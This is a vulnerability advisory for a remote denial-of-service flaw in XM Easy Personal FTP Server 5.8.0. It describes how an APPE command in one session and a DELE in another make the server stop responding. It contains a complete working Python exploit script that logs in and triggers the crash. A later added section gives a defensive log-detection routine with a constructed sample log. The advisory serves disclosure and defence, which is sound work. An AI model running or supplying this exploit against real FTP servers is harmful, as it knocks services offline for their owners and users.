
XM Easy Personal FTP Server 'APPE' and 'DELE' Command Remote Denial of Service Vulnerability



Date of Discovery: 13-Nov-2009

Credits: zhangmc[at]mail.ustc.edu.cn

Vendor: Dxmsoft

Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. A 
denial-of-service vulnerability exists in XM Easy Personal FTP Server when 
the "APPE" command is used in one socket connection while the "DELE" command 
is used in another.

Details:
If you can log on to the server successfully, take the following steps and 
the FTP server will stop responding:

First socket connection:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" %username)
3. sock.send("pass %s\r\n" %passwd)
4. sock.send("PORT 127,0,0,1,122,107\r\n")
5. sock.send("APPE "+ test_string +"\r\n")
6. sock.close()

Second socket connection:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" %username)
3. sock.send("pass %s\r\n" %passwd)
4. sock.send("DELE "+ test_string +"\r\n")

Severity:
High

Exploit example:

#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage:  ./expl.py <serv_ip>      <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
        Usage()
        sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string="a"
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("user %s\r\n" %username)
    print "[-] "+ ("user %s\r\n" %username)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("pass %s\r\n" %passwd)
    print "[-] "+ ("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] "+ r

    sock_data.bind(('127.0.0.1',31339))
    sock_data.listen(1)
    
    sock.send("PORT 127,0,0,1,122,107\r\n")
    print "[-] "+ ("PORT 127,0,0,1,122,107\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
        
    sock.send("APPE "+ test_string +"\r\n")
    print "[-] "+ ("APPE "+ test_string +"\r\n")
    r=sock.recv(1024)
    print "[+] "+ r
    

     
    sock.close()
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("user %s\r\n" %username)
    print "[-] "+ ("user %s\r\n" %username)
    r=sock.recv(1024)
    print "[+] "+ r
    sock.send("pass %s\r\n" %passwd)
    print "[-] "+ ("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] "+ r

    sock.send("DELE "+ test_string +"\r\n")
    print "[-] "+ ("DELE "+ test_string +"\r\n")
    r=sock.recv(1024)
    print "[+] "+ r    
    
    sys.exit(0);
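
Detection example (added here, not part of the original advisory or the vendor's code): a log check for the sequence described under "Details", an APPE on a path followed shortly by a DELE of the same path from a different session. The log format (epoch seconds, session id, command, argument), the 60-second window and the names find_appe_dele_races and SAMPLE_LOG are assumptions, and the sample log lines are constructed.

```python
# Added example: flag the APPE-then-DELE sequence from the advisory in FTP command logs.
# Assumed log format per line: <epoch seconds> <session id> <command> <argument>
from collections import namedtuple

Alert = namedtuple("Alert", "path appe_session dele_session gap_seconds")

# Constructed sample log (not captured from a real server).
SAMPLE_LOG = """\
1258100000 s1 USER anonymous
1258100001 s1 PASS anonymous
1258100002 s1 PORT 127,0,0,1,122,107
1258100003 s1 APPE a
1258100004 s1 CLOSE -
1258100005 s2 USER anonymous
1258100006 s2 PASS anonymous
1258100007 s2 DELE a
1258100100 s3 APPE report.txt
1258100900 s4 DELE report.txt
1258101000 s5 APPE notes.txt
1258101001 s5 DELE notes.txt
"""

def parse(line):
    # maxsplit=3 keeps file names that contain spaces in one argument field.
    ts, session, command, *rest = line.split(None, 3)
    # Commands are case-insensitive on the wire ("user" vs "USER"), so normalise.
    return int(ts), session, command.upper(), (rest[0].strip() if rest else "")

def find_appe_dele_races(log_text, window=60):
    """Return an Alert for each DELE that hits a path another session just APPE'd."""
    pending = {}  # path -> (session id, timestamp) of the most recent APPE
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, session, command, arg = parse(line)
        if command == "APPE":
            pending[arg] = (session, ts)
        elif command == "DELE" and arg in pending:
            appe_session, appe_ts = pending.pop(arg)
            # Same-session append/delete and widely spaced operations are ignored.
            if session != appe_session and ts - appe_ts <= window:
                alerts.append(Alert(arg, appe_session, session, ts - appe_ts))
    return alerts

if __name__ == "__main__":
    for alert in find_appe_dele_races(SAMPLE_LOG):
        print(alert)
```

An alert that coincides with the FTP service going unresponsive is the pattern to escalate; the window should be tuned to how long legitimate appends stay open in the environment.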